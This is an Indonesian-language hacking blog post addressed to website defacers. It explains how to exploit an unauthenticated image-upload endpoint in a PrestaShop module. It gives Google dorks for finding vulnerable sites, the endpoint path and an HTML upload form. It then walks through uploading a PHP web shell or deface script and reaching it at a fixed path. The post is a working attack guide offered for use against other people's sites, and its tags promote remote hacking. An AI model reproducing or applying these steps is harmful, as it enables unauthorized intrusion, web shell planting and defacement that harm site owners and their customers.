» » » » Deface Menggunakan Pretashop Attribute Upload

Deface Menggunakan Pretashop Attribute Upload

Halo para defacer , kali ini gua akan sedikit share tentang Tutorial Deface Menggunakan Pretashop Attribute Upload

kita sudah tau metode prestashop sebelumnya, tapi kali ini metodenya agak sedikit berbeda dengan yang sebelumnya , oke langsung saja kita bahas

Bahan :

Shell
CSRF
Kopi
Pacar

#############################################################################

Google Dork :
inurl:/modules/attributewizard
inurl:modules/attributewizard/disable_json.php
(use ur briant ) 

Exploit :
/modules/attributewizard/image_upload.php
 contoh : www.site.com/modules/attributewizard/image_upload.php

CSRF :
<form method="POST" action="www.Target.com/modules/attributewizard/image_upload.php"
enctype="multipart/form-data">
<input type="file" name="userfiles" /><button>Hajar !</button>
</form>
Vulnerability: Akan Muncul tulisan ERROR

Step by Step :

1. Cari target ( bisa juga di images )

2. pilih salah satu web , lalu kita exploit

3. klo vuln , nanti akan ada tulisan ERROR (di pojok kiri atas )

4. masukan site tersebut ke CSRF ( www.site.com/modules/attributewizard/image_upload.php )

5. buka CSRF tadi, lalu upload Shell kalian ( ext shell .php )

6. kalau sukses , nanti akan keluar tulisan sukses . shell punyamu.php

7. akses shellnya akan berubah  menjadi

www.site.co.li/modules/attributewizard/img/id_group_.php 

8. jika tidak bisa di pasang shell . Upload saja Script Deface punya kalian, dan akses scriptnya juga sama

 ww.site.co.li/modules/attributewizard/img/id_group_.php

 

NB :Apapun nama shell kalian / Script Defacean kalian akan berubah jadi id_group_.php 

 

Semoga Bermanfaat

@Sumber : TKJ Cyber 71 

Tags : Cara untuk Meretas sebuah Komputer,trick Hack Komputer Super Jail,Cara Mematikan Komputer Orang Lain,Cara Mengendalikan Komputer Jarak Jauh,Cara Meretas Komputer Orang Lain,Cara Hack Komputer Orang Lain,Cara Meretas Komputer Orang dari Jarak Jauh,Cara memantau Komputer lain dengan Command Prompt,Cara hack komputer remote menggunakan IP,Trik Hack Komputer yang Sangat Berbahaya,Dasar-dasar Meretas,Dasar-dasar Hack,
Share this article please, on :
Share on fb Tweet Share on G+

0 Response to "Deface Menggunakan Pretashop Attribute Upload"

Post a Comment

Subscribe to: Post Comments (Atom)
Powered by Blogger.